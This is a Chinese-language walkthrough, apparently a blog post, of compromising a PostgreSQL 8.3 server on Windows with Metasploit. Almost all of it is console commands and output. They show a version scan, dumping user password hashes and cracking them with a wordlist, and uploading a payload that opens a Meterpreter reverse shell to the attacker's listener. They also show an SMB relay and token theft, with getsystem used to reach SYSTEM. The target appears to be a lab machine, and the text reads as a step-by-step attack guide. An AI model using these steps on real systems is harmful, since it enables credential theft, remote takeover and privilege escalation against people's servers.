VERBOSE false no Enable verbose output
msf auxiliary(postgres_version) >
|
写入IP 帐号密码 端口 你懂的
1
2
3
4
5
6
7
8
9
10
|
msf auxiliary(postgres_version) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(postgres_version) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf auxiliary(postgres_version) > exploit
[*] 5.5.5.3:5432 Postgres - Version PostgreSQL 8.3.18, compiled by Visual C++ build 1400 (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_version) >
|
Version PostgreSQL 8.3.18 ^_^
导出全部用户密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
msf auxiliary(postgres_version) > use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(postgres_hashdump) > show options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME postgres yes The username to authenticate as
msf auxiliary(postgres_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf auxiliary(postgres_hashdump) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(postgres_hashdump) > exploit
[*] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
dis9team 7ca3de2618396dfaa75515c29885396e
postgres a3556571e93b0d20722ba62be61e8c2d
test 5a2e54ee57e5b7273b9a8fed78c1ebd8
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_hashdump) >
|
保存到了 /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
查看一下:
1
2
3
4
5
6
|
brk@Dis9Team:/tmp$ cat /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
Username,Hash
"dis9team","7ca3de2618396dfaa75515c29885396e"
"postgres","a3556571e93b0d20722ba62be61e8c2d"
"test","5a2e54ee57e5b7273b9a8fed78c1ebd8"
brk@Dis9Team:/tmp$
|
同时已经记录在MSF数据库里面:
1
2
3
4
5
6
7
8
9
10
|
msf auxiliary(postgres_hashdump) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
5.5.5.3 postgres postgres.hashes 5.5.5.3-5432_postgreshashes.txt text/plain Postgres Hashes /home/brk/.msf4/loot/20120312070517_default_5.5.5.3_postgres.hashes_391828.txt
msf auxiliary(postgres_hashdump) >
|
破解全部用户密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
msf auxiliary(postgres_hashdump) > use auxiliary/analyze/postgres_md5_crack
msf auxiliary(postgres_md5_crack) > show options
Module options (auxiliary/analyze/postgres_md5_crack):
Name Current Setting Required Description
---- --------------- -------- -----------
Munge false no Munge the Wordlist (Slower)
Wordlist /tmp/1.txt no The path to an optional Wordlist
msf auxiliary(postgres_md5_crack) > set Wordlist /tmp/1.txt
Wordlist => /tmp/1.txt
msf auxiliary(postgres_md5_crack) > exploit
[*] Processing wordlist...
[*] Wordlist length: 88399
[*] Attempting to crack hash: dis9team:7ca3de2618396dfaa75515c29885396e
[+] Username: dis9team Pass: 123456
[*] Attempting to crack hash: postgres:a3556571e93b0d20722ba62be61e8c2d
[+] Username: postgres Pass: 123456
[*] Attempting to crack hash: test:5a2e54ee57e5b7273b9a8fed78c1ebd8
[+] Username: test Pass: 123456
[*] Auxiliary module execution completed
msf auxiliary(postgres_md5_crack) >
|
恩,破解出来了。。。。。。。。 数据库中的记录
1
2
3
4
5
6
7
8
9
10
11
12
13
|
msf auxiliary(postgres_md5_crack) > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
5.5.5.3 5432 dis9team 123456 password true
5.5.5.3 5432 postgres 123456 password true
5.5.5.3 5432 test 123456 password true
[*] Found 3 credentials.
msf auxiliary(postgres_md5_crack) >
|
获得系统权限
这个菜是种口味
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
|
msf > use exploit/windows/postgres/postgres_payload
msf exploit(postgres_payload) > show options
Module options (exploit/windows/postgres/postgres_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD no The password for the specified username. Leave blank for a random password.
RHOST yes The target address
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 5.5.5.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(postgres_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf exploit(postgres_payload) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(postgres_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Authentication successful and vulnerable version 8.3 on Windows confirmed.
[*] Uploaded Ekhazpht.dll as OID 51954 to table gclggupi(trnuqjax)
[*] Command Stager progress - 1.48% done (1499/101465 bytes)
[*] Command Stager progress - 2.95% done (2998/101465 bytes)
[*] Command Stager progress - 4.43% done (4497/101465 bytes)
[*] Command Stager progress - 5.91% done (5996/101465 bytes)
[*] Command Stager progress - 7.39% done (7495/101465 bytes)
[*] Command Stager progress - 8.86% done (8994/101465 bytes)
[*] Command Stager progress - 10.34% done (10493/101465 bytes)
[*] Command Stager progress - 11.82% done (11992/101465 bytes)
[*] Command Stager progress - 13.30% done (13491/101465 bytes)
[*] Command Stager progress - 14.77% done (14990/101465 bytes)
[*] Command Stager progress - 16.25% done (16489/101465 bytes)
[*] Command Stager progress - 17.73% done (17988/101465 bytes)
[*] Command Stager progress - 19.21% done (19487/101465 bytes)
[*] Command Stager progress - 20.68% done (20986/101465 bytes)
[*] Command Stager progress - 22.16% done (22485/101465 bytes)
[*] Command Stager progress - 23.64% done (23984/101465 bytes)
[*] Command Stager progress - 25.12% done (25483/101465 bytes)
[*] Command Stager progress - 26.59% done (26982/101465 bytes)
[*] Command Stager progress - 28.07% done (28481/101465 bytes)
[*] Command Stager progress - 29.55% done (29980/101465 bytes)
[*] Command Stager progress - 31.02% done (31479/101465 bytes)
[*] Command Stager progress - 32.50% done (32978/101465 bytes)
[*] Command Stager progress - 33.98% done (34477/101465 bytes)
[*] Command Stager progress - 35.46% done (35976/101465 bytes)
[*] Command Stager progress - 36.93% done (37475/101465 bytes)
[*] Command Stager progress - 38.41% done (38974/101465 bytes)
[*] Command Stager progress - 39.89% done (40473/101465 bytes)
[*] Command Stager progress - 41.37% done (41972/101465 bytes)
[*] Command Stager progress - 42.84% done (43471/101465 bytes)
[*] Command Stager progress - 44.32% done (44970/101465 bytes)
[*] Command Stager progress - 45.80% done (46469/101465 bytes)
[*] Command Stager progress - 47.28% done (47968/101465 bytes)
[*] Command Stager progress - 48.75% done (49467/101465 bytes)
[*] Command Stager progress - 50.23% done (50966/101465 bytes)
[*] Command Stager progress - 51.71% done (52465/101465 bytes)
[*] Command Stager progress - 53.18% done (53964/101465 bytes)
[*] Command Stager progress - 54.66% done (55463/101465 bytes)
[*] Command Stager progress - 56.14% done (56962/101465 bytes)
[*] Command Stager progress - 57.62% done (58461/101465 bytes)
[*] Command Stager progress - 59.09% done (59960/101465 bytes)
[*] Command Stager progress - 60.57% done (61459/101465 bytes)
[*] Command Stager progress - 62.05% done (62958/101465 bytes)
[*] Command Stager progress - 63.53% done (64457/101465 bytes)
[*] Command Stager progress - 65.00% done (65956/101465 bytes)
[*] Command Stager progress - 66.48% done (67455/101465 bytes)
[*] Command Stager progress - 67.96% done (68954/101465 bytes)
[*] Command Stager progress - 69.44% done (70453/101465 bytes)
[*] Command Stager progress - 70.91% done (71952/101465 bytes)
[*] Command Stager progress - 72.39% done (73451/101465 bytes)
[*] Command Stager progress - 73.87% done (74950/101465 bytes)
[*] Command Stager progress - 75.35% done (76449/101465 bytes)
[*] Command Stager progress - 76.82% done (77948/101465 bytes)
[*] Command Stager progress - 78.30% done (79447/101465 bytes)
[*] Command Stager progress - 79.78% done (80946/101465 bytes)
[*] Command Stager progress - 81.25% done (82445/101465 bytes)
[*] Command Stager progress - 82.73% done (83944/101465 bytes)
[*] Command Stager progress - 84.21% done (85443/101465 bytes)
[*] Command Stager progress - 85.69% done (86942/101465 bytes)
[*] Command Stager progress - 87.16% done (88441/101465 bytes)
[*] Command Stager progress - 88.64% done (89940/101465 bytes)
[*] Command Stager progress - 90.12% done (91439/101465 bytes)
[*] Command Stager progress - 91.60% done (92938/101465 bytes)
[*] Command Stager progress - 93.07% done (94437/101465 bytes)
[*] Command Stager progress - 94.55% done (95936/101465 bytes)
[*] Command Stager progress - 96.03% done (97435/101465 bytes)
[*] Command Stager progress - 97.51% done (98934/101465 bytes)
[*] Command Stager progress - 98.95% done (100400/101465 bytes)
[*] Command Stager progress - 100.00% done (101465/101465 bytes)
|
PostgreSQL SMB ATTACK
恩 首先链接数据库
1
2
3
4
5
6
7
8
|
brk@Dis9Team:/tmp$ psql -h 5.5.5.3 -U postgres
用户 postgres 的口令:
psql (8.4.11, 服务器 8.3.18)
警告:psql 版本8.4, 服务器版本8.3.
一些psql功能可能无法工作.
输入 "help" 来获取帮助信息.
postgres=#
|
生成smb relay
1
2
3
4
5
6
|
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 5.5.5.1:4444
[*] Server started.
msf exploit(smb_relay) >
|
创建个表:
1
2
3
|
postgres=# CREATE TABLE sb(sb text);
ERROR: relation "sb" already exists
postgres=#
|
恩 我已经创建过了
读共享 获得SHELL
低权限SHELL
如果我有一个低权限SHELL,那么METASPLOIT能自动提升权限
链接SHELL
1
2
3
4
5
6
7
8
9
10
11
12
13
|
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 DIS9TEAM-A1\admin @ DIS9TEAM-A1 5.5.5.1:3333 -> 5.5.5.3:1155 (5.5.5.3)
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
|
查看权限
1
2
3
|
meterpreter > getuid
Server username: DIS9TEAM-A1\admin
meterpreter >
|
恩 不是系统权限
权限提升
额 蓝屏了。。
不扒 咱们重新来=.=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
|
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
112 pgagent.exe
200 pg_ctl.exe
264 postgres.exe
364 SMSS.EXE
520 httpd.exe
588 csrss.exe
612 winlogon.exe
656 services.exe
676 lsass.exe
828 VBoxService.exe
872 svchost.exe
944 svchost.exe
1040 svchost.exe
1092 svchost.exe
1144 postgres.exe
1148 svchost.exe
1224 postgres.exe
1276 postgres.exe
1280 postgres.exe
1288 postgres.exe
1300 postgres.exe
1428 spoolsv.exe
1692 Explorer.EXE x86 0 DIS9TEAM-A1\admin C:\WINDOWS\Explorer.EXE
1796 VBoxTray.exe x86 0 DIS9TEAM-A1\admin C:\WINDOWS\system32\VBoxTray.exe
1816 ctfmon.exe x86 0 DIS9TEAM-A1\admin C:\WINDOWS\system32\ctfmon.exe
1924 httpd.exe
1968 mysqld.exe
2652 alg.exe
2836 wscntfy.exe x86 0 DIS9TEAM-A1\admin C:\WINDOWS\system32\wscntfy.exe
2988 wuauclt.exe
3760 iexplore.exe x86 0 DIS9TEAM-A1\admin C:\Program Files\Internet Explorer\iexplore.exe
3952 notepad.exe x86 0 DIS9TEAM-A1\admin C:\WINDOWS\System32\notepad.exe
meterpreter > steal_token 3760
Stolen token with username: DIS9TEAM-A1\admin
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
|
恩 成功了
|
推荐
评论(0条)
